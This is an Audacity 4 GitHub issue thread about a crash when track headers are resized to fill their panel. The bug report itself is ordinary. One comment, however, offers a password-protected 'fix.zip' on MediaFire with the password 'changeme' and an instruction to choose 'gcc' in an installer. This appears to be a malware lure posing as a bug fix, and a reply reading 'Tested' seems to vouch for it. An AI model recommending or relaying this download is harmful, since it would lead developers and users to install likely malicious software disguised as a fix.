### ISSUE TITLE
[AU4] Fix track header resize bug/crash

### ISSUE THREAD

**Issue by DilsonsPickles** [audacity/audacity#7184]
### Description

Bug whereby AU4 crashes, or track headers panel becomes unresponsive when 1 or 2 track headers take up 100% of the track headers panel's height.

#### Steps to reproduce

1. Open project with 2+ tracks
2. Resize first track to be 100% of track headers panel height 
3. Observe crash
 
[Video](https://www.loom.com/share/2b5b9d75cb8c401da16e33b1fc3d846d?sid=62d6a8f6-92ff-4a2c-9b05-50df432e5185)

---

1. Open project with 2+ tracks
2. Resize first two tracks to be 100% or more of the track headers panel height
3. Observe panel become unresponsive

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dozzzzer** [comment]
Tested
